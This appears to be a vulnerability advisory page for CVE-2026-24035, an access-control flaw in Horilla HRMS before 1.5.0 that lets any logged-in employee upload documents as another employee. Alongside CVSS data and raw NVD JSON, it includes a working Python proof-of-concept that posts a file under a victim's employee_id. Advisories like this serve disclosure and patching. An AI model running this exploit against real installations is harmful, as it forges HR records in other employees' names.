Security Vulnerability Report
中文
CVE-2026-24035 CVSS 4.3 MEDIUM

CVE-2026-24035

Published: 2026-01-22 04:15:59
Last Modified: 2026-01-29 19:02:03
Source: [email protected]

Description

Horilla is a free and open source Human Resource Management System (HRMS). An Improper Access Control vulnerability exists in Horilla HR Software starting in version 1.4.0 and prior to version 1.5.0, allowing any authenticated employee to upload documents on behalf of another employee without proper authorization. This occurs due to insufficient server-side validation of the employee_id parameter during file upload operations, allowing any authenticated employee to upload document in behalf of any employee. Version 1.5.0 fixes the issue.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:horilla:horilla:1.4.0:*:*:*:*:*:*:* - VULNERABLE
Horilla HRMS >= 1.4.0
Horilla HRMS < 1.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-24035 PoC - Horilla HRMS Improper Access Control # Description: Authenticated user can upload documents on behalf of other employees def exploit_cve_2026_24035(base_url, attacker_token, target_employee_id): """ Exploit improper access control in Horilla HRMS file upload Args: base_url: Target Horilla HRMS base URL attacker_token: Valid authentication token for attacker account target_employee_id: Employee ID of the victim (to upload docs as them) Returns: bool: True if exploitation appears successful """ upload_endpoint = f"{base_url}/payroll/document/create/" headers = { "Authorization": f"Bearer {attacker_token}", "X-Requested-With": "XMLHttpRequest" } # Malicious file with target employee's ID files = { "document": ("exploit.txt", b"Malicious content uploaded via CVE-2026-24035", "text/plain") } # VULNERABLE: No server-side validation of employee_id data = { "employee_id": target_employee_id, # Attacker can specify any employee "title": "Unauthorized Document Upload", "description": "Document uploaded by exploiting CVE-2026-24035" } try: response = requests.post(upload_endpoint, headers=headers, files=files, data=data, timeout=30) if response.status_code == 200 or response.status_code == 201: print(f"[+] Successfully uploaded document for employee_id: {target_employee_id}") print(f"[+] Exploitation successful - improper access control bypassed") return True else: print(f"[-] Upload failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python cve_2026_24035.py <base_url> <attacker_token> <target_employee_id>") sys.exit(1) base_url = sys.argv[1] attacker_token = sys.argv[2] target_employee_id = sys.argv[3] exploit_cve_2026_24035(base_url, attacker_token, target_employee_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24035", "sourceIdentifier": "[email protected]", "published": "2026-01-22T04:15:59.453", "lastModified": "2026-01-29T19:02:03.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Horilla is a free and open source Human Resource Management System (HRMS). An Improper Access Control vulnerability exists in Horilla HR Software starting in version 1.4.0 and prior to version 1.5.0, allowing any authenticated employee to upload documents on behalf of another employee without proper authorization. This occurs due to insufficient server-side validation of the employee_id parameter during file upload operations, allowing any authenticated employee to upload document in behalf of any employee. Version 1.5.0 fixes the issue."}, {"lang": "es", "value": "Horilla es un Sistema de Gestión de Recursos Humanos (HRMS) gratuito y de código abierto. Existe una vulnerabilidad de control de acceso inadecuado en el software Horilla HR a partir de la versión 1.4.0 y anterior a la versión 1.5.0, que permite a cualquier empleado autenticado subir documentos en nombre de otro empleado sin la autorización adecuada. Esto ocurre debido a una validación insuficiente del lado del servidor del parámetro employee_id durante las operaciones de carga de archivos, lo que permite a cualquier empleado autenticado subir documentos en nombre de cualquier empleado. La versión 1.5.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:horilla:horilla:1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "55143854-C369-4CAA-B671-90EFC9170F64"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1i00-NnipvxH8bGY-SyqEjnDQfxIbVGRR/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://github.com/horilla-opensource/horilla/releases/tag/1.5.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/horilla-opensource/horilla/security/advisories/GHSA-fm3f-xpgx-8xr3", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.